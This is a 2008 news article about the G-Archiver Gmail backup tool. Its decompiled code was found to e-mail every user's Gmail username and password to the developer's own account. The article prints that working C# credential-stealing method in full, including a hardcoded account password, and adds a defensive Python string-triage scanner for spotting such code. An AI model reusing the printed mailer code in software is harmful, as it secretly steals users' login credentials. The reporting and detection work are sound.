Trojan steals Gmail passwords – and charges for it
By David M Williams
Wednesday, 12 March 2008 16:19
The news was broken by software developer and blogger Jeff Atwood, who was in turn given the details by Dustin Brooks.
Brooks, it transpires, wanted to back up his Gmail account to a local drive. That's an understandable need; with mail storage in the order of gigabytes Gmail is a boon to hoarders and road warriors everywhere. You needn't even constrain yourself to e-mail: utilities exist to let you make use of all that lovely Google-provided disk space as a virtual hard drive. So, Brooks had a bunch of stuff in his Gmail account that he didn't want to lose.
He came across G-Archiver, a tool designed specifically for this very purpose which retails for $US 29.95 and offers a free trial. Brooks duly downloaded the software and gave it a spin. It prompted for his Gmail login details and he handed them over. G-Archiver performed its basic task but didn't quite do what Brooks would have liked.
Not to worry: being a programmer himself, he used Lutz Roeder's well-known .NET Reflector to decompile the program and have a look inside. Now, ordinarily picking apart someone else's proprietary code is ethically dodgy, if not a breach of the licence. However, what Brooks discovered completely overshadowed any such concerns.
Someone called John Terry, almost certainly a member of the G-Archiver development team if not its author, had hardcoded his own Gmail username and password into the program. Brooks then noticed that every time a user ran G-Archiver and added a new Gmail account, the program e-mailed that user's credentials to John Terry's mailbox! The following code was plainly visible in the decompiled SM.dll installed by the software (comments added here for readability; the code itself is as decompiled):
    // Innocuous name; a and b are the Gmail username and password the user just entered.
    public static void CheckConnection(string a, string b) {
        try {
            MailMessage message = new MailMessage();
            message.To.Add("JTerry79@gmail.com");
            message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
            message.Subject = "Account";
            message.SubjectEncoding = Encoding.UTF8;
            // The victim's credentials become the message body.
            message.Body = "Username: " + a;
            message.Body = message.Body + "\r\nPassword: " + b;
            message.BodyEncoding = Encoding.UTF8;
            message.IsBodyHtml = false;
            message.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            // Sent through Gmail itself, authenticating as the attacker's own account.
            client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
            client.Port = 0x24b;          // 587, Gmail's SMTP submission port
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;      // the stolen credentials travel encrypted
            client.Send(message);
        }
        catch (Exception) { }             // any failure is silently swallowed
    }
The key lines are the ones beginning with message.Body: an e-mail is built from the literal strings "Username:" and "Password:" followed by the username and password passed into the function as the parameters a and b, which the rest of the program fills in with whatever the user has just typed into the login prompt.
The code then sends this message through Gmail's own SMTP server (smtp.gmail.com on port 0x24b, that is 587, with SSL enabled) to the address JTerry79@gmail.com, authenticating as that very account with the password bilal482. Note the empty catch block at the end: if the send fails for any reason, the exception is discarded and the user never sees an error, so the exfiltration is silent whether or not it succeeds.
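Brooks found this by decompiling, but the infrastructure such code depends on (a mail server hostname, a recipient address, "Username:"/"Password:" labels) also shows up as plain string literals in the binary, so a quick static triage can flag a download like this before it is ever run. The catch is that .NET assemblies store string literals as UTF-16LE in the #US heap, so an ASCII-only `strings` pass misses every one of them. The following script is an added example, not code from the article or from G-Archiver: it extracts both ASCII and UTF-16LE string runs from a blob and flags the combination of a mail host, an e-mail address and credential labels. The sample blob is constructed here to imitate the literals from the decompiled method above; it is not the real SM.dll.

```python
"""Static triage of a binary for credential-exfiltration indicators.

Added example; the SAMPLE_BLOB below is constructed, not taken from SM.dll.
"""
import re

# Runs of 6+ printable characters, once as plain ASCII and once as UTF-16LE
# (each ASCII character followed by a NUL byte), which is how .NET stores
# string literals in an assembly's #US heap.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_HOST = re.compile(r"^(?:smtp|mail|imap|pop3?)\.[A-Za-z0-9.-]+$", re.I)
CRED_LABEL = re.compile(r"(password|passwd|pwd|username|login)\s*[:=]", re.I)


def extract_strings(blob: bytes):
    """Return [(encoding, text)] for every ASCII and UTF-16LE run in the blob."""
    found = []
    for m in ASCII_RUN.finditer(blob):
        found.append(("ascii", m.group().decode("ascii")))
    for m in UTF16_RUN.finditer(blob):
        found.append(("utf-16le", m.group().decode("utf-16-le")))
    return found


def triage(blob: bytes):
    """Return [(encoding, text, [indicator, ...])] for strings that look like
    the plumbing of a credential-stealing mailer."""
    hits = []
    for enc, s in extract_strings(blob):
        reasons = []
        if EMAIL.search(s):
            reasons.append("email-address")
        if MAIL_HOST.match(s):
            reasons.append("mail-server-host")
        if CRED_LABEL.search(s):
            reasons.append("credential-label")
        if reasons:
            hits.append((enc, s, reasons))
    return hits


def looks_like_credential_exfil(hits) -> bool:
    """A credential label plus somewhere to send it is the G-Archiver pattern."""
    kinds = {r for _, _, reasons in hits for r in reasons}
    return "credential-label" in kinds and (
        "mail-server-host" in kinds or "email-address" in kinds
    )


def _utf16(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed sample: a few bytes of fake header, one ASCII string, then the
# literals from the decompiled method laid out as UTF-16LE with NUL separators.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"SM.dll\x00"
    + b"\x00\x01\x02"
    + _utf16("JTerry79@gmail.com") + b"\x00"
    + _utf16("Account") + b"\x00"
    + _utf16("Username: ") + b"\x00"
    + _utf16("\r\nPassword: ") + b"\x00"
    + _utf16("smtp.gmail.com") + b"\x00"
    + _utf16("bilal482") + b"\x00"
    + b"\xff\xfe\x00\x00"
)


if __name__ == "__main__":
    hits = triage(SAMPLE_BLOB)
    for enc, s, reasons in hits:
        print(f"{enc:9} {s!r:28} {', '.join(reasons)}")
    print("credential exfiltration pattern:", looks_like_credential_exfil(hits))
    ascii_only = [s for enc, s in extract_strings(SAMPLE_BLOB) if enc == "ascii"]
    print("what an ASCII-only strings pass would show:", ascii_only)
```

Two things worth noticing when running it. First, every flagged string is UTF-16LE; the ASCII pass sees only "SM.dll", which is why `strings -el` (or a scanner like this) is needed for .NET binaries. Second, the password literal itself ("bilal482") is never flagged: a scanner can spot the mailer and the labels, but an opaque secret looks like any other short string, so the verdict rests on the combination of indicators rather than on recognising the secret.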
Brooks was concerned; after all, he'd just typed in his own login details! He fired up his web browser, called up Gmail and logged in to John Terry's account with the username and password contained within the bowels of G-Archiver. What he saw stunned him again.
Please read on to find out what happened.